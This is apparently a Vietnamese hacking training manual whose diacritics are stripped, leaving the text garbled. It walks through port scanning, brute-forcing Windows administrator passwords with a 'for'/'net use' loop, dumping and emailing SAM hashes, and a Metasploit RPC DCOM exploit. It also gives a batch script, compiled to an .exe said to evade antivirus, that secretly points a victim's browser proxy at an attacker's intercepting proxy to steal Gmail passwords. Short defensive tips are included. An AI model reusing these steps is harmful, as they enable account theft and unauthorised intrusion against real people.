Tan cong va_bao_ve_he_thong

Copyright by Tocbatdat Research manager I-train.com.vn

I-train.com.vn Professional Training Service

Tn cng v bo v h thng

Copyright by Tocbatdat

Research Manager

I-train.com.vn



Phn I. Scan port ton tp v cch phng chng ....................................................... 6

I. Nguyn tc truyn thng tin TCP/IP ................................................................... 6

1. Cu to gi tin TCP ......................................................................................... 6

2. Khi Client mun thc hin mt kt ni TCP vi Server u tin: ................. 7

3. Khi Client mun kt thc mt phin lm vic vi Server ............................... 8

II. Nguyn tc Scan Port trn mt h thng. .......................................................... 8

1. TCP Scan ......................................................................................................... 8

2. UDP Scan. ......................................................................................................10

III. Scan Port vi Nmap. .......................................................................................10

IV. Kt lun. ..........................................................................................................13

Phn I. Tn cng Password ca ti khon ngi dng trong Windows. .................14

I.S dng lnh For trong Windows. .....................................................................14

1. Gii m mt khu c m ho. ....................................................................16

Phn II. Tn cng h thng Windows qua l hng bo mt. ...................................23

1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng. ..24

Phn III. Hack password xc thc bng Certificate v cch phng chng .............32

I. Hiu bit chung ..................................................................................................32

II. Tools s dng ...................................................................................................35

III. K thut ly Password Gmail .........................................................................36

1. t proxy cho ngi dng .............................................................................36

2. Tit hnh ........................................................................................................37



I. Pht hin v bo mt cho Account Gmail .........................................................45

1. Pht hin khi vo mng c qua mt Proxy hay khng ..................................45

Phn IV. Tn cng DoS/DDoS v cch phng chng .............................................50

I. Lch s ca tn cng DoS ..................................................................................50

1. Mc tiu .........................................................................................................50

2. Cc cuc tn cng. .........................................................................................50

II. nh ngha v tn cng DoS ............................................................................51

1. Cc mc ch ca tn cng DoS ....................................................................51

2. Mc tiu m k tn cng thng s dng tn cng DoS ..............................52

III. Cc dng tn cng ...........................................................................................52

1. Cc dng tn cng DoS..................................................................................52

IV. Cc cng c tn cng DoS ..............................................................................58

1. Tools DoS Jolt2 ..........................................................................................59

2. Tools DoS: Bubonic.c ....................................................................................59

3. Tools DoS: Land and LaTierra ......................................................................60

4. Tools DoS: Targa ...........................................................................................60

5. Tools DoS Blast 2.0 .......................................................................................61

6. Tools DoS Nemesys ...................................................................................61

7. Tool DoS Panther2. ....................................................................................62

8. Tool DoS Crazy Pinger ...............................................................................62

9. Tool DoS Some Trouble .............................................................................64

10. DoS Tools UDP Flood ..............................................................................65

11. Tools DoS FSMAX ..................................................................................66



V. Kt lun phn I. ................................................................................................66

VI. Mng BOT NET .............................................................................................68

1. ngha ca mng BOT .................................................................................68

2. Mng BOT .....................................................................................................69

3. Mng Botnet. .................................................................................................69

4. Mc ch s dng mng Botnets ...................................................................70

5. Cc dng ca mng BOT. ..............................................................................71

6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot. .....................72

7. S cch h thng b ly nhim v s dng Agobot. .................................74

VII. Cc tools tn cng DDoS ..............................................................................74

1. Nuclear Bot. ...................................................................................................74

VIII. Tn cng DDoS ............................................................................................75

1. Cc c tnh ca tn cng DDoS. ..................................................................76

2. Tn cng DDoS khng th ngn chn hon ton. .........................................76

3. K tn cng khn ngoan. ...............................................................................77

IX. Phn loi tn cng DDoS................................................................................78

X. Tn cng Reflective DNS (reflective - phn chiu). .......................................80

1. Cc vn lin quan ti tn cng Reflective DNS .......................................80

2. Tool tn cng Reflective DNS ihateperl.pl ................................................81

Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt .....................83

1. Vai tr ca Command Line ...............................................................................83

2. To ra file.bat thc thi t ng mt s thao tc ................................................83

3. Cu hnh REGISTRY bng file.bat ..................................................................85



4. ng dng cu hnh REGISTRY .......................................................................87

5. Kt lun .............................................................................................................89

Phn VII. Backdoor v Trojan ton tp ...................................................................90

1. Gii thiu v Trojans. .......................................................................................90

2. Cc dng v cch hot ng ca Trojan ...........................................................91

3. Nhng con ng my tnh nn nhn nhim Trojan. ..................................92

4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C th

khng ng. ...........................................................................................................93

5. S dng mt s loi Trojan...............................................................................94

6. Cch n mt hoc nhiu Trojan vo mt file .exe hay file chy bnh thng 102

7. Cch pht hin Trojan. ....................................................................................106

8. Cch phng chng Trojans v Backdoor ........................................................110

9. Kt lun. ..........................................................................................................111

Phn VIII. K thut hack Web s dng upload file PHP v cch phng chng ...112

I. Cc tools cn thit ...........................................................................................113

1. Burpsuite_v1.3 .............................................................................................113

II. K thut upload file PHP v chim quyn iu khin my ch web ............114

1. Chun b .......................................................................................................114

2. Thc hin Upload file php ln website ........................................................114

III. K thut bo v my ch .................................................................................138



Phn I. Scan port ton tp v cch phng chng

Trong bi vit ny ti trnh by vi cc bn cc nguyn tc Scan Port c bn trn

h thng, nhng k thut scan t chng ta bit trn mt h thng ang s dng

nhng Port no. T nhng khi nim v Scan ti cng trnh by vi cc bn gii

php ngn cm Scan trn h thng. Ni dung trong bi vit gm:

1. Nguyn tc truyn thng tin TCP/IP

2. Cc Nguyn tc v Phng thc Scan Port

3. S dng phn mm Nmap

I. Nguyn tc truyn thng tin TCP/IP

1. Cu to gi tin TCP



Trong bi vit ny ti ch ch trng ti cc thit lp Flag trong gi tin TCP nhm

mc ch s dng Scan Port:

- Thng s SYN yu cu kt ni gia hai my tnh

- Thng s ACK tr li kt ni gia hai my c th bt u c thc hin

- Thng s FIN kt thc qu trnh kt ni gia hai my

- Thng s RST t Server ni cho Client bit rng giao tip ny b cm (khng

th s dng)

- Thng s PSH s dng kt hp vi thng s URG

- Thng s URG s dng thit lp u tin cho gi tin ny.

Tht ra ton b cc thng s ny trong gi tin n ch th hin l 1 hoc 0 nu l

0 th gi tin TCP khng thit lp thng s ny, nu l 1 th thng s no c

thc hin n s ln lt trong 8 bits trong phn Flag.

2. Khi Client mun thc hin mt kt ni TCP vi Server u tin:

+ Bc I: Client bn n Server mt gi tin SYN

+ Bc II: Server tr li ti Client mt gi tin SYN/ACK

+ Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK

v qu trnh trao i thng tin gia hai my bt u.



3. Khi Client mun kt thc mt phin lm vic vi Server

+ Bc I: Client gi n Server mt gi tin FIN ACK

+ Bc II: Server gi li cho Client mt gi tin ACK

+ Bc III: Server li gi cho Client mt gi FIN ACK

+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server

v Client c thc hin.

II. Nguyn tc Scan Port trn mt h thng.

1. TCP Scan

Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1

65535 port. Khng mt hacker no li scan ton b cc port trn h thng, chng

ch scan nhng port hay s dng nht thng ch s dng scan t port 1 ti port

1024 m thi.

Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt

kt ni gia hai my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca

TCP ti c th Scan Port no m trn h thng bng nhng phng thc sau y:

- SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server

nu server gi v gi SYN/ACK th Client bit Port trn Server c m. Nu

Server gi v cho Client gi RST/SYN ti bit port trn Server ng.



- FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s

port nht nh gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit

Server m port , nu Server gi v gi RST th Client bit Server ng port .

- NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan

m khng cha thng s Flag no, nu Server gi li gi RST th ti bit port

trn Server b ng.

- XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan

cha nhiu thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit

port trn Server b ng.

- TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu

cu kt ni thc t ti cc port c th trn server. Nu server tr v gi SYN/ACK

th Client bit port m, nu Server gi v gi RST/ACK Client bit port trn

Server b ng.

- ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn

Server. Client c gng kt ni ti Server bng gi ICMP nu nhn c gi tin l

Host Unreachable th client s hiu port trn server b lc.

C vi dng Scan cho cc dch v in hnh d b tn cng nh:

- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng.

- Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt

s port nht nh.

- FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay

khng

- IDLE cho php kim tra tnh trng ca my ch.



2. UDP Scan.

Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c

truyn ti ch. Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu

nhanh vi cc gi tin nh. Vi qu trnh thc hin truyn tin bng TCP k tn cng

d dng Scan c h thng ang m nhng port no da trn cc thng s Flag

trn gi TCP.

Cu to gi UDP

Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng

cc phng thc Scan port ca TCP s dng cho UDP c. Tht khng may hu

ht h thng u cho php gi ICMP.

Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi

mt gi ICMP type 3 code 3 port vi ni dung l unreachable v Client. Khi thc

hin UDP Scan bn hy chun b tinh thn nhn c cc kt qu khng c tin

cy cao.

III. Scan Port vi Nmap.

Nmap l mt tool scan port rt mnh v ni danh t lu c gii hacker tin

dng. N h tr ton b cc phng thc scan port, ngoi ra n cn h tr cc

phng thc scan hostname, service chy trn h thng .



Nmap hin gi c c giao din ho v giao din command line cho ngi dng,

chy trn c mi trng .NIX v Windows.

Phn mm nmap min ph cc bn download ti a ch:

http://nmap.org/download.html

Di y l cch s dng Nmap scan

C:\nmap-3.93>nmap -h

Nmap 3.93 Usage: nmap [Scan Type(s)] [Options]

Some Common Scan Types ('*' options require root privileges)

* -sS TCP SYN stealth port scan (default if privileged (root))

-sT TCP connect() port scan (default for unprivileged users)

* -sU UDP port scan

-sP ping scan (Find any reachable machines)

* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)

-sV Version scan probes open ports determining service and app names/versions

-sR/-I RPC/Identd scan (use with other scan types)

Some Common Options (none are required, most can be combined):

* -O Use TCP/IP fingerprinting to guess remote operating system

-p ports to scan. Example range: '1-1024,1080,6666,31337'

-F Only scans ports listed in nmap-services

-v Verbose. Its use is recommended Use twice for greater effect.

-P0 Don't ping hosts (needed to scan www.microsoft.com and others)

* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys

-6 scans via IPv6 rather than IPv4

-T General timing policy

-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]

-oN/-oX/-oG Output normal/XML/grepable scan logs to

-iL Get targets from file; Use '-' for stdin



* -S /-e Specify source address or network interface

--interactive Go into interactive mode (then press h for help)

--win_help Windows-specific features

Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'

SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND

EXAMPLES

Nmap Scan

a. Cc dng Scan nmap h tr.

Nmap sT: trong ch s l Scan, cn ch T l dng TCP scan

Nmap sU: l s dng UDP Scan

Nmap sP: s dng Ping scan

Nmap sF: s dng FIN Scan

Nmap sX: s dng phng thc XMAS Scan

Nmap sN: s dng phng thc NULL Scan

Nmap sV: s dng Scan tn cc ng dng v version ca n

Nmap SR /I RPC s dng scan RPC

b. Cc option cao cp kt hp vi cc dng Scan trong Nmap.

- O: s dng bit h iu hnh chy trn my ch v nh ta dng Nmap s dng

phng thc scan l XMAS Scan v on bit h iu hnh ca:

www.vnexperts.net ta dng cu lnh: nmap sX o www.vnexperts.net.

- P: gii port s dng scan



- F: Ch nhng port trong danh sch scan ca Nmap

- V: S dng Scan hai ln nhm tng tin cy v hiu qu ca phng thc scan

no ta s dng.

- P0: khng s dng ping Scan nhm mc ch gim thiu cc qu trnh qut

ngn chn scan trn cc trang web hay my ch.

V nh ti mun Scan trang web www.vnexperts.net bng phng thc UDP Scan

s port ti s dng l t 1 ti 1024 v s dng hai ln nng cao hiu qu, khi

scan s khng ping ti trang ny:

Nmap sU P 1-1024 V P0 www.vnexperts.net

Ngoi ra nmap cn h tr tnh nng scan n nhm trnh nhng qu trnh qut trn

server nh s dng:

-Ddecoy_host1, decoy2 s n qu trnh Scan.

-6: Scan IPv6

Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh

dng file khc nhau.

IV. Kt lun.

Scan port l mt trong nhng bc u tin tn cng vo mt h thng, hiu

c cc phng thc scan chng ta c th dng nmap thc hin. Sau cch

chng ta cm Scan l s dng cc thit b chuyn dng nh IPS, IDS detect

v ngn chn tn cng



Phn II. Hack Windows ton tp v cch phng chng

Hack Windows ton tp Cch phng chng.

Windows l h iu hnh ph bin nht trn th gii, n lun tim n nhng li

bo mt. Trong bi vit ny ti s trnh by vi cc bn nhng phng thc tn

cng mt my tnh ci h iu hnh Windows. T nhng kin thc v kh nng tn

cng vo my tnh ci h iu hnh Windows ti s a ra cc gii php bo mt

cho h thng.

Cc ni dung trong bi vit:

1. Tn cng Password ca ti khon trong Windows.

2. Tn cng my tnh ci Windows thng qua cc l hng bo mt

Phn I. Tn cng Password ca ti khon ngi dng trong Windows.

My b tn cng

Ci Windows 2003My tn cng

Switch

I.S dng lnh For trong Windows.

- My b tn cng a ch IP: 192.168.1.18, my s dng tn cng cng

nm trong mng 192.168.1.0/24.

- Hu ht tt c cc my u chia s ti nguyn trong h thng mng, v c

mt th mc c Share n mc nh l th mc \\computer\IPC$

- Khi ta bit c User trn my l Administrator ta ch quan tm lm

th no bit c mt khu ca ti khon .



- To mt file t in cha hu ht cc mt khu thng dng dng tools

Dictionary Generator to ra b t in ny.

- Cu to ca lnh for:

- For /f tokens=1 %a in (vnedic.txt) do net use * \\computer\IPC$

/user:administrator %a

- Trong vnedic.txt l file t in c to, s dng Net User Map

File t in ti I: vi tn vnedic.txt. Sau khi h thng tm

password trong file vnedict.txt tm c password ca ti khon

Administrator ca my 192.168.1.8 l 123.

- C rt nhiu phng php to ra b t in s dng lnh for tn cng

vo h thng Windows.

- Nhc im ca phng php ny l rt chm c th tn cng c

mt h thng my tnh c mt khu phc tp.

Gii php chng tn cng s dng lnh For:



- Thit lp trong Group Policy khi g Password sai 5 ln s b lock 30 pht

1. Gii m mt khu c m ho.

a. Trn my Local

- Gi s bn khng bit mt khu ca mt my tnh trong h thng, nhng

bn li nh ngi g mt khu ca h v cho bn mn my tnh

dng tm. V bn gi y l lm th no bit c Password trn my

bn ang logon.

- Rt nhiu phn mm c th Exports on m ho ca Password ra thnh

mt File in hnh l PasswordDump, WinPasswordPro, trong bi vit

ny ti trnh by vi cc bn s dng WinPasswordPro.

Bt chng trnh WinPasswordPro ln Import Password t my Local



Sau Khi Import Password t file SAM vo s c



Sau ta Export danh sch User v Password c m ho ra mt file

.txt v gi vo Mail ca chng ta, sang my chng ta cng dung phn

mm ny gii m ngc li.

M file TXT exports ra ta c d liu password c m ho

Sau khi ly c d liu User Password m ho ta Uninstall chng

trnh ny trn my nn nhn khi l - ri gi file vo Mail v

my ca ta Gii m y l cng on tn thi gian. i vi mt khu

di 10 k t mt khong 1 ting.



- Bt chng trnh WinPasswordPro trn my ca chng ta chn File ->

Import PWDUMP file ri chn ng dn ti file password c m

ho.

Sau khi Import t file PWDUMP ta c - Nhn vo Start ta s c 3

phng thc tn cng Password

+ Brute Force

+ Dictionary

+ Smart Table

Ti chn phng thc tn cng Brute Force



i khong 15 pht (y l password do ti khng t k t c bit, khng

s, khng hoa v 9 k t)

- Kt thc qu trnh ti gii m c file Password c m ho vi:

user administrator v Password l vnexperts



b. Tn cng my t xa.

- Khi chng ta c ngi trn my nn nhn Exports Password c m

ho l n gin nhng thc t s rt t khi thc hin c phng thc

ny.

- Dng Password Dump chng ta s ly c d liu c m ho t

mt my t xa.

- y ti dng PasswordDump Version 6.1.6



trn ti s ly d liu m ho Username v Password t my tnh

192.168.1.156 dung PWDump v out d liu ra file: vnehack.txt ti

C: dng lnh Type xem d li ca file .

Sau Khi c d liu ny ta li s dng WinPasswordPro gii m. V

sau khi ta c ti khon User Administrator v Password ca n th vic

lm g l tu thuc vo chng ta.

- Gii php phng chng hnh thc tn cng ny:

+ phng nhng ngi truy cp vo my tnh ca chng ta.

+ t Password di trn 14 k t v c y cc k t: c bit, hoa,

s, thng



+ Enable Firewall ln chng PasswordDUMP, Ci t v cp nht cc

bn v li mi nht t nh sn xut

+ Ci t ti thiu mt chng trnh dit Virus mnh.

V hiu ho PWdump nhng lu khi k tn cng c mt ti khon

trong h thng th li hon ton khc chng s vt qua hu ht cc

phng chng bo mt: trong trng hp ny ti c mt User bnh thng

vi tn vne ti c th Exports ton b d liu Username Password c

m ho my ch.

Phn II. Tn cng h thng Windows qua l hng bo mt.

- u tin chng ta phi tm nhng l hng bo mt.

- Khai thc l hng tm c



1. Dng Retina Network Security Scanner 5.1 tm l hng trn h thng.

Bt chng trnh Retina Network Security Scanner ln:

Chng ta mun tm kim trong h thng mng nhng my no ang Online vo

phn Discover

pht hin ra l hng bo mt s dng Tab Audit

Ti s s dng chng trnh ny kim tra my 192.168.1.8



Nhn Start - Chn Scan Template l ch Complete Scan:

i mt nt ti c kt qu tht bt ng: my tnh 192.168.1.8 b rt nhiu l

hng bo mt

- Ti pht hin ra li nguy him trn my cha c Fix trn Service RPC

l: Windows RPC DCOM Multiple Vulerabilities.

- c thm phn m rng v li ny ti pht hin ra li ny cho php ta

truy cp bt hp php ti my tnh .



Retina Network Security Scanner l phn mm rt hiu qu Scan h thng v

pht hin ra cc l hng bo mt y l phn mm c bn quyn.

1. S dng Metasploit khai thc.

- Nhng l hng va c Retina pht hin gi chng ta s s dng

Metasploit khai thc chng, y ti dung bn metasploit 2.7 - Hin

nay c bn 3.0

Sau khi ci t MetaSploit ti bt giao din Web bng cch di y:



- Sau bt MSFWeb ti vo IE g a ch: http://127.0.0.1:55555



- La trn trong Filter Modules l Windows 2003

Trong nhng li tm thy v c th khai thc bi MetaSploit trn

Windows 2003 ti tm thy li RPC Service

Nhn vo l hng bo mt ny



Chng trnh thong bo l hng bo mt ny s c khai thc trn cc

h iu hnh NT, 2K, XP, v 2K3

Nhn vo h thng s cho php chng ta s dng cc chng trnh

di y khai thc vo l hng bo mt ny



Ti la chn Win32_Reverse_vncinject

Sauk hi ti la chn s dng vncinject ti la chn my ch cn Sploit

l: 192.168.1.8

Nhn Exploit khai thc l hng bo mt trn



Kt qu tht tuyt vi ti Remote Desktop n my m khng cn

thong qua bt c phng thc xc thc no, v gi ti ton quyn vi

my tnh ny.

Mt kt qu lm au u cc nh bo mt nhng chng ta khng phi

khng c gii php phng chng.

- Cch phng chng cc li bo mt l:

+ Lun update cc bn v li mi nht t nh sn xut

+ Enable Firewall ch m nhng cng cn thit cho cc ng dng

+ C thit b IDS pht hin xm nhp

+ C Firewall chng Scan cc Service ang chy.



Phn III. Hack password xc thc bng Certificate v cch phng chng

Trong bi vit ny ti s trnh by vi cc bn k thut Hack Password ca s dng

Certificate m ha nh gmail.com hay cc trang web khc xc thc mt cch

tng t (SSL Certificate HTTPS). i vi nguy c bn c th b l Password

Gmail, trong bi vit ny ti s trnh by cch nhn bit v ngn chn nguy c ny.

I. Hiu bit chung

- Gmail hay nhng dch v web khc thng s dng HTTPS m

ha gi tin User/Pass. Khi trnh duyt web s dng Certificate ca

Gmail cung cp v m ha th gi tin User/Pass khi i trn mng s an

ton mc (gn nh tuyt i).

- K h y l th no m li c th Hack c pass ca nhng

phng thc xc thc v m ha c tnh bo mt cao.

Qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:

Bc 1: Ngi dng truy cp gmail.com

Bc 2: Gmail s gi thng tin ti Versign ly Certificate



Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v

Private key

Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin

xc thc

Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail

Bc 6: Gmail s dng Private key gii m

*note: gi tin m ha user/pass ngi dng gi ln gmail c m ha

bng public key th ch c private key mi gii m dc. Trong khi

Private key c Gmail d li v khng truyn trn mng. Nn gi tin

ny cc k bo mt v khng c kh nng gii m



K thut gi mo Certifcate

Ngi dng vo Gmail s khng i thng m i qua mt Intercepting

Proxy v b gi mo Certificate

Bc 1: Ngi dng vo Gmail

Bc 2: Khi gi tin t ngi dng vo Intercept proxy n s chnh sa

thng tin v gi ln Gmail

Bc 3: Gmail gi yu cu ln Versign sinh Certificate

Bc 4: Verisign gi Certificate v cho Gmail. Gmail d li Private key

v gi cho ngi yu cu Public key

Bc 5: Gmail gi Public key cho Intercept Proxy, Key ny s khng

c gi cho ngi dng



Bc 6: Intercept Proxy t ra mt cp key v gi Public key v cho

ngi dng

Bc 7: ngi dng s dng Public Key gi ny do Proxy sinh ra m

ha user/pass v gi ln cho proxy. Proxy do t sinh ra cp key nn s c

Private key gii m.

Bc 8: Sau khi gii m c gi tin ngi dng truyn ln Proxy s s

dng Public Key ca Gmail gi cho ri m ha gi ln gmail v qu

trnh xc thc vn dc thc hin

*Note: Khi nu k tn cng ng trn con Intercept Proxy th hon

ton c th bit c User/Pass ca ngi dng. Ngi dng khng ch

khi i qua mt Intercept proxy th user/pass hon ton c th b l, mc

d s dng cc phng thc xc thc rt bo mt

II. Tools s dng

- Burpsuite_v1.3

Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip

y l mt tools c tnh nng l mt Intercept Proxy

- Java (Burpsuite l file .jar chy trn nn Java)

Link download: http://sun.com

- IE, Firefox

- Tools thit lp Proxy bng mt file

y l tools ti t vit dng file .bat hoc cc bn c th chuyn

file.bat sang file.exe khi ngi dng kch vo file ny s t ng

thit lp Proxy

- Quick_Batch_File_Compiler_3.21 l mt tools chuyn file.bat

file.exe

http://www.portswigger.net/suite/burpsuite_v1.3.ziphttp://sun.com/



III. K thut ly Password Gmail

- Cch thng thng nht l s dng Keylogger nhng cch ny khng

s dng c khi c cc chng trnh dit virus mnh.

- Export thng tin t trnh duyt web nh IE, Firefox. Cch ny khng

thc hin c khi ngi dng khng lu User/Pass trn trnh duyt

- Cn mt cch l gi mo Certificate v s dng Intercept Proxy

1. t proxy cho ngi dng

- ton b ni dung ngi dng truy cp web i qua Intercept Proxy

th cn phi thit lp proxy trn trnh duyt ca ngi dngj

- Cch thit lp c th bn thit lp bng tay (bng mt cch no c

quyn iu khin my tnh ca nn nhn)

- Hng ngi dng chy mt file.exe m do chng ta vit thit lp

proxy

********

To ra mt file.bat vi ni dung:

echo Windows Registry Editor Version 5.00 > 1

echo

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr

entVersion\Internet Settings] >2

echo "MigrateProxy"=dword:00000001 > 3

echo "ProxyEnable"=dword:00000001 > 4

echo "ProxyHttp1.1"=dword:00000000 > 5

echo "ProxyServer"="IP:port" > 6

echo "ProxyOverride"="" > 7

copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg

del 1 /f /q

del 2 /f /q

del 3 /f /q



del 4 /f /q

del 5 /f /q

del 6 /f /q

del 7 /f /q

regedit.exe /s b.reg

del b.reg /f /q

********

Sau dng tools Quick_Batch_File_Compiler_3.21 chuyn file.bat

ny sang file.exe

- Khi ngi dng nhn vo file ny s t ng thit lp proxy cho IE

vi IP bn thay bng IP bn cn thit lp, Port l port ca Proxy s

dng. iu rt hay l file ny tt c cc chng trnh dit virus u

khng coi l Virus

- Trong bi vit ny ti s dng mt my tnh nn proxy ti thit lp

trn trnh duyt l 127.0.0.1

2. Tit hnh

Bc 1: Ci t Java

Bc 2: Chy Burpsuite

Bc 3: Thit lp Proxy

Bc 4: Truy cp Gmail

Bc 5: Vo Proxy xem thng tin User/Pass

Bc 1: Ci t Java

- Sau khi bn download b ci Java t trang sun.com bn ci t

chun b mi trng cho cc chng trnh chy trn mi trng Java

Bc 2: Chy Burpsuite

- Sau khi download Burpsuite tin hnh gii nn khi n file .jar th

dng li



- Chy chng trnh Burpsuite_v1.3 lm Intercepting Proxy. Nhn

p vo file .jar gii nn t b download c

Chy chng trnh Burpsuite



Mc nh chng trnh ny ch lm proxy cho chnh my chy chng trnh, cc

my khc c th s dng chng trnh ny lm proxy phi Vo tab proxy

chn Options ri c th Edit ty bin port s dng (mc nh l 8080) b du

check box loopback ony

Chuyn sang tab Intercept cu hnh cc mode hot ng ca

Intercepting proxy

- Ch Intercept on: y l ch hot ng. Nu mt ngi t my

tnh ny lm proxy th ton b qu trnh truy cp ra internet u b

proxy ny qun l. Khi mt request t trnh duyt ti Proxy, n s

pht hin ni dung c th chnh sa v forward i th mi ti my ch

web

- Chng ta tt ch ny bng cch nhn vo Intercept on s thnh off.

Mc ch khi ngi dng s dng phn mm ny lm proxy th vn c

th vo Internet bnh thng. ch ny ch lu li cc thng

tin ngi dng truy cp



web

Bc 3: t Proxy

- Vo IE chnh proxy vo a ch 127.0.0.1 port 8080. IE IE options

tab connection nhn vo nt LAN Settings

- Hoc chy file.bat vi ni dung nh trn

- Dng tools chuyn file.bat file.exe ri chy file.exe ny cng c



Bc 4: Vo Gmail qua IE ( thit lp Proxy)

Truy cp vo Gmail s thy thng bo Certificate li nhn continue

tip tc



Tip tc google s thng bo Certificate Error bn vn g

Username password truy cp vo Mail

Ti vo c mail vn cn thng bo Certificate Error



Bc 5: Vo Proxy tm thng tin Username v Pass

- Vo Burpsuite Chuyn sang tab Target Chn Site Map

- La chn trang web https://www.google.com Vo mc Accounts

Vo mc ServiceLoginAuth Nhn chuyn sang bn phi chn

Request (thng tin gi ln server) vo mc Raw chng ta s thy

thng tin Username v Passwor

https://www.google.com/



I. Pht hin v bo mt cho Account Gmail

Mun hack password gmail k tn cng phi hng ngi dng t

Proxy i qua mt Intercept Proxy sau gi mo Certificate do mun

pht hin v bo mt cho Account Gmail bn c th thc hin bng cc

cch:

1. Pht hin khi vo mng c qua mt Proxy hay khng

Kim tra bng cch trc khi vo Internet truy cp vo mc thit lp

Proxy xem c a ch no c thit lp hay cha.

Cch ny rt hu ch nhng xem ra c phn rm r kh thc hin v d

b qun hay b qua

1. Pht hin Certificate b gi mo

a. Khi truy cp bnh thng

+ Vo Gmail s khng bt ra nhng pop-up xut download

Certificate

+ Nhn chut vo biu tng cc kha view Certifcate s thy n

c sinh ra t Verisign



b. Khi truy cp i qua mt Intercept Proxy

+ Truy cp vo Gmail s xut hin ca s ny thng bo Certificate

ca bn b li c tip tc hay khng. Nu thy biu tng ny

khuyn co ngi dng khng nn tip tc v kim tra li an ton

ca mng v my tnh trc khi truy cp



+ Nu ngi dng tip tc truy cp vo trang Gmail s khng c biu

tng cc kha m thay vo l biu tng Certificate Error.

+ Nhn xem Certificate ny chng ta s thy Certificate ny khng

phi do Verisign sinh ra



Note: Nu ngi dng thy hai yu t ny khuyn co khng nn tip tc

vo Gmail v Username v password ca bn hon ton c th b mt. Ngoi

ra ngi dng khng nn lu mt khu t ng truy cp bi khi my tnh

ri vo tay ngi khc th thng tin cn lu li trn IE, Firefox hon toan c

th b khai thc d dng. Ngi dng cng nn ci t cc chng trnh dit

Virus ngn chn cc loi Virus, Keylogger n chm mt khu.



Phn IV. Tn cng DoS/DDoS v cch phng chng

Ni dung chi tit trong bi vit:

1. Lch s cc cuc tn cng DoS v DDoS

2. nh ngha v: Denial of Service Attack

3. Cc dng tn cng DoS

4. Cc tool tn cng DoS

5. Mng BOT net

6. Tn cng DDoS

7. Phn loi tn cng DDoS

8. Cc tools tn cng DDoS

9. Su my tnh (worms) trong tn cng DDoS

I. Lch s ca tn cng DoS

1. Mc tiu

- Mc tiu cc cuc tn cng thng vo cc trang web ln v cc t chc thng

mi in t trn Internet.

2. Cc cuc tn cng.

- Vo ngy 15 thng 8 nm 2003, Microsoft chu t tn cng DoS cc mnh v

lm gin on websites trong vng 2 gi.

- Vo lc 15:09 gi GMT ngy 27 thng 3 nm 2003: ton b phin bn ting anh

ca website Al-Jazeera b tn cng lm gin on trong nhiu gi



II. nh ngha v tn cng DoS

Tn cng DoS l kiu tn cng v cng nguy him, hiu c n ta cn phi

lm r nh ngha ca tn cng DoS v cc dng tn cng DoS.

- Tn cng DoS l mt kiu tn cng m mt ngi lm cho mt h thng khng

th s dng, hoc lm cho h thng chm i mt cch ng k vi ngi dng

bnh thng, bng cch lm qu ti ti nguyn ca h thng.

- Nu k tn cng khng c kh nng thm nhp c vo h thng, th chng c

gng tm cch lm cho h thng sp v khng c kh nng phc v ngi

dng bnh thng l tn cng Denial of Service (DoS).

Mc d tn cng DoS khng c kh nng truy cp vo d liu thc ca h thng

nhng n c th lm gin on cc dch v m h thng cung cp. Nh nh

ngha trn DoS khi tn cng vo mt h thng s khai thc nhng ci yu nht ca

h thng tn cng, nhng mc ch ca tn cng DoS:

1. Cc mc ch ca tn cng DoS

- C gng chim bng thng mng v lm h thng mng b ngp (flood), khi

h thng mng s khng c kh nng p ng nhng dch v khc cho ngi dng

bnh thng.

- C gng lm ngt kt ni gia hai my, v ngn chn qu trnh truy cp vo dch

v.

- C gng ngn chn nhng ngi dng c th vo mt dch v no

- C gng ngn chn cc dch v khng cho ngi khc c kh nng truy cp vo.

- Khi tn cng DoS xy ra ngi dng c cm gic khi truy cp vo dch v nh

b:

+ Disable Network - Tt mng



+ Disable Organization - T chc khng hot ng

+ Financial Loss Ti chnh b mt

2. Mc tiu m k tn cng thng s dng tn cng DoS

Nh chng ta bit bn trn tn cng DoS xy ra khi k tn cng s dng ht ti

nguyn ca h thng v h thng khng th p ng cho ngi dng bnh thng

c vy cc ti nguyn chng thng s dng tn cng l g:

- To ra s khan him, nhng gii hn v khng i mi ti nguyn

- Bng thng ca h thng mng (Network Bandwidth), b nh, a, v CPU

Time hay cu trc d liu u l mc tiu ca tn cng DoS.

- Tn cng vo h thng khc phc v cho mng my tnh nh: h thng iu ho,

h thng in, ht hng lm mt v nhiu ti nguyn khc ca doanh nghip. Bn

th tng tng khi ngun in vo my ch web b ngt th ngi dng c th

